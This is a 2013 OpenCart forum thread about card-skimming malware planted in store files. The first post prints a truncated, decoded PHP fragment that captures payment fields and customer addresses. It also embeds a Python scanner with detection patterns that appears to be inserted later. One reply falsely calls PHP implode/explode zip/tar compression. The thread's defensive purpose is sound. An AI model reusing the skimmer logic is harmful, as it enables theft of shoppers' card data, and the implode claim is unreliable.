
Protect your Clients

Posted: Tue May 21, 2013 9:50 pm
by MarketInSG
With the rise in cases of malicious files being uploaded into many OpenCart installations, we should all protect our clients. I managed to get my hands on the code that was uploaded maliciously and looked into it.

The code does no harm to the store owners, but it seems to harm your clients instead. It seems to be stealing credit card information.

A quick look at the code shows the data being packed into a binary string.

Code:

pack("H*",substr($h,$i,2))
After unpacking and uncompressing it, the following portion of the code is what you get. It is pretty long, but a quick look suggests it is collecting your credit card information.

Code:

]) && substr($req['route'],0,8)=='payment/') { if(isset($req['cc_number']) || isset($req['ccnum']) || isset($req['CardNumber']) || isset($req['cardNumber']) || isset($req['cardnumber']) || isset($req['transaction']['credit_card']) || isset($req['fatzebra']) || isset($req['payment']['cc_number']) || isset($req['webpos_cc_number'])) { $df=DB_PREFIX; $ccc=$db->query("SELECT ".$df."customer.customer_id,".$df."customer.firstname, ".$df."customer.lastname, ".$df."customer.email, ".$df."customer.telephone, ".$df."customer.ip, ".$df."address.firstname as a_fn, ".$df."address.lastname as a_ln, ".$df."address.company, ".$df."address.address_1, ".$df."address.address_2, ".$df."address.city, ".$df."address.postcode, ".$df."country.iso_code_3, ".$df."zone.code, ".$df."zone.name FROM ".$df."customer LEFT JOIN ".$df."address ON ".$df."customer.customer_id=".$df."address.customer_id LEFT JOIN ".$df."country ON ".$df."address.country_id=".$df."country.country_id LEFT JOIN ".$df."zone ON ".$df."address.zone_id=".$df."zone.zone_id WHERE ".$df."customer.customer_id = '".(int)$ses['customer_id']."' AND ".$df."address.address_id = '".(int)$ses['payment_address_id']."'"); $sr='err'; if ($ccc->num_rows) { $sr=time().'|'.implode("|",array_merge($ccc->row,array(serialize($req)))); } elseif(isset($ses['guest'])) { $gs=$ses["guest"]; $pay=$ses["guest"]["payment"]; 
$sr=time().'|-1|'.(isset($gs['firstname'])?$gs['firstname']:'').'|'.(isset($gs['lastname'])?$gs['lastname']:'').'|'.(isset($gs['email'])?$gs['email']:'').'|'.(isset($gs['telephone'])?$gs['telephone']:'').'|'.(@$_SERVER['REMOTE_ADDR']).'|'.(isset($pay['firstname'])?$pay['firstname']:'').'|'.(isset($pay['lastname'])?$pay['lastname']:'').'|'.(isset($pay['company'])?$pay['company']:'').'|'.(isset($pay['address_1'])?$pay['address_1']:'').'|'.(isset($pay['address_2'])?$pay['address_2']:'').'|'.(isset($pay['city'])?$pay['city']:'').'|'.(isset($pay['postcode'])?$pay['postcode']:'').'|'.(isset($pay['iso_code_3'])?$pay['iso_code_3']:'').'|'.(isset($pay['zone_code'])?$pay['zone_code']:'').'|'.(isset($pay['zone'])?$pay['zone']:'').'|'.serialize($req); } 
What you should look at to stop this:

1. Look at your OpenCart installation's download folder. Remove files that aren't meant to be in there.
2. Look at your encryption key and ensure it's no longer 12345.
3. Look at your system/library/customer.php file and ensure there is no code that looks like the following:

Code:

function h2b($h) { 
4. Change your download directory to something else if possible.

That should be all :)
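The steps above can be turned into a repeatable check. The following is an added example written for this thread (it is not MarketInSG's code, nor part of OpenCart): it undoes the loader's two layers the way the injected helper does (the byte-by-byte pack("H*", ...) loop is plain hex decoding; the "uncompress" step is assumed here to be gzuncompress(), i.e. zlib, which the thread does not state) and then walks an install looking for the indicators named in the thread: the h2b() helper, a pack("H*") loop, a runtime decompress call, the "cacne" misspelling, ENCRYPTION_KEY still set to 12345 in config.php, and any PHP-executable file inside download/. The indicator regexes, the rule that download/ should contain no PHP, and the sample tree built by build_sample_install() are my assumptions and constructed data, not something taken from a real compromised store.

```python
import os
import re
import shutil
import tempfile
import zlib
from typing import Dict, List

# Static indicators taken from the thread (h2b helper, pack("H*") loop, a
# decompress call, the "cacne" misspelling); the regexes are my own wording.
STATIC_INDICATORS = {
    "hex-unpack loop": re.compile(r'pack\s*\(\s*["\']H\*["\']'),
    "h2b helper": re.compile(r'function\s+h2b\s*\('),
    "runtime decompress": re.compile(r'\bgz(?:un)?compress\s*\(|\bgzinflate\s*\('),
    "cache misspelt cacne": re.compile(r'cacne'),
}
# OpenCart's config.php defines ENCRYPTION_KEY; the thread warns about 12345.
WEAK_KEY = re.compile(r"define\s*\(\s*['\"]ENCRYPTION_KEY['\"]\s*,\s*['\"]12345['\"]")
# Request keys the decoded skimmer probes for before harvesting.
CARD_FIELDS = ("cc_number", "ccnum", "CardNumber", "cardNumber", "cardnumber",
               "webpos_cc_number")
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def decode_payload(hex_blob: str) -> str:
    """Undo the loader: the pack('H*', substr($h,$i,2)) loop is hex decoding,
    and the 'uncompress' step is ASSUMED to be gzuncompress() (zlib format)."""
    return zlib.decompress(bytes.fromhex(hex_blob)).decode("utf-8", "replace")


def card_fields_in(decoded_php: str) -> List[str]:
    """Which of the skimmer's card-field probes appear in a decoded payload."""
    return [f for f in CARD_FIELDS if f in decoded_php]


def scan_php_file(path: str) -> List[str]:
    """Return the names of the static indicators found in one PHP file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = [name for name, rx in STATIC_INDICATORS.items() if rx.search(text)]
    if os.path.basename(path) == "config.php" and WEAK_KEY.search(text):
        hits.append("default ENCRYPTION_KEY 12345")
    return hits


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk an OpenCart install and map relative path -> indicator hits.
    Assumption: download/ holds only purchased downloads, so any PHP file
    there is flagged regardless of content."""
    findings: Dict[str, List[str]] = {}
    download_dir = os.path.join(root, "download")
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(PHP_EXT):
                continue
            hits = scan_php_file(path)
            if path.startswith(download_dir + os.sep):
                hits.append("PHP file in download/")
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


def build_sample_install(root: str) -> None:
    """Write a CONSTRUCTED mini OpenCart tree carrying each indicator, so the
    scanner can be exercised offline; none of this is real site content."""
    files = {
        "config.php": "<?php\ndefine('ENCRYPTION_KEY', '12345');\n",
        "system/library/customer.php": (
            "<?php\nclass Customer { }\n"
            "function h2b($h) { $b=''; for($i=0;$i<strlen($h);$i+=2) "
            "{ $b.=pack(\"H*\",substr($h,$i,2)); } return $b; }\n"
            "eval(gzuncompress(h2b($x)));\n"
        ),
        "download/shell.php": "<?php echo 'dropped here';\n",
        "download/manual.pdf.5f3a": "%PDF-1.4 placeholder\n",
        "catalog/controller/common/header.php": "<?php\nclass ControllerCommonHeader { }\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo() -> Dict[str, object]:
    """Scan the constructed tree and decode a constructed hex blob."""
    root = tempfile.mkdtemp(prefix="oc_scan_")
    try:
        build_sample_install(root)
        findings = scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)
    # Constructed stand-in for the loader's blob: a zlib-compressed snippet,
    # hex-encoded the way the injected h2b() expects to receive it.
    snippet = b"if(isset($req['cc_number']) || isset($req['ccnum'])) { /* harvest */ }"
    blob = zlib.compress(snippet).hex()
    return {"findings": findings, "card_fields": card_fields_in(decode_payload(blob))}


if __name__ == "__main__":
    for rel_path, hits in demo()["findings"].items():
        print(rel_path, "->", ", ".join(hits))
```

Point scan_tree() at the store's document root to run it against a real install. When a hit is found, pull the hex string the helper is fed, pass it through decode_payload() and check card_fields_in() on the result; a non-empty list means the blob is the card-harvesting stage rather than some unrelated obfuscated code. Files whose timestamps or sizes differ from the rest of the tree deserve the same treatment even if no regex fires.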

Re: Protect your Clients

Posted: Wed May 22, 2013 5:17 pm
by Avvici
Thank you for the information O0

Re: Protect your Clients

Posted: Wed May 22, 2013 6:24 pm
by i2Paq
@MarketInSG, where is that code located?

Re: Protect your Clients

Posted: Thu May 23, 2013 12:35 am
by MarketInSG
They have added some functions to system/library/customer.php. After unpacking and uncompressing it, you will get the code I mentioned above. A deeper look shows some information they also store as cacne.language.1536510365. Look at how they spell cache as cacne to store the retrieved data.

Re: Protect your Clients

Posted: Wed Jun 05, 2013 5:31 am
by butte
Thank you for that one, MarketInSG!

Scanning by eye for "pack" and other oddball words, and for any subtle misspellings, will help. Paying attention to timestamps as well as to file sizes everywhere in the directory trees will help. Familiarity with those is invaluable in finding problems, as well as in eliminating them.

Your or your client's servers may allow a setting to approve outbound connections, meaning to specific destinations. Turning that on can play havoc with .atom or .rss feeds, but it does prevent using the website as a relay or as a hacked source of outbound messages. Requirements for PHP mail and for SMTP mail can be tightened, and augmenting the special means by such simple means as an SPF TXT record can help to truncate usage before and after the in-house outbound senders (the final -all means no others; ~all means all but maybe not).

It's worth renaming download/ to something not readily guessed, whether with a prefix or suffix, a synonym of some sort, or gibberish. Just remember to change both config.php files, and probably to let vqmod in on it, too (there's an editable path file in /vqmod for such changes as those).

Re: Protect your Clients

Posted: Thu Jun 06, 2013 3:29 am
by butte
Interesting. Where the code "portion . . . seems like getting your credit card information" above may have been truncated (by MarketInSG) so as not to give the wrong people the whole idea, what we're seeing may have aborted:

It asks, looks, joins, implodes, then asks anew, looks, and then stops. The conditional "{ if(isset($req" sets up for the next "{ $df=DB_PREFIX" and "query("SELECT ".$df." of non-card customer registration data, for the ensuing "LEFT JOIN" of the corresponding non-card data IDs, before the next { goes to ".implode("|",array_merge($ccc->row,array" of those, and before the closing "}" whereupon "elseif(isset($ses['guest'])" looks instead at guest data, then payment portal and payment data with a closing "}".

The attempt may well have failed to go out, or to have set up properly for encryption and decryption of data, even if it was cached as a language file (with a .trailer extension calling to mind the .jpg.trailer extensions). It imploded itself, he exploded it (zip/tar, unzip/untar). Without untangling the entirety we can only hope that it was a "work in progress" and was not fully armed or usable. I aborted one that was fully entrenched, was fully armed, and operated globally, but that had evidently failed to extract usable card information or to open the database itself -- but for the oxymoron it was almost "elegantly malicious and disruptive"; but otherwise to no net avail of consequence.

Re: Protect your Clients

Posted: Thu Jun 06, 2013 10:49 am
by MarketInSG
I truncated the code so that it doesn't go around being used by everyone ;) I don't know what's with zip/tar etc... but they stored it simply in a file :)

Re: Protect your Clients

Posted: Thu Jun 06, 2013 12:38 pm
by butte
Truncating that as I thought you might have done was a jolly good idea.

The implode and other similar commands are to compress, and the explode and other similar commands are to decompress, either into/from a "zipped" file on Windows or a "tarred" file on Linux-Unix. Nowadays most utilities can make and open both files.

Re: Protect your Clients

Posted: Sat Jun 08, 2013 5:02 pm
by blewettymack
This is a must if you want to remain in the business and if you want to succeed in it.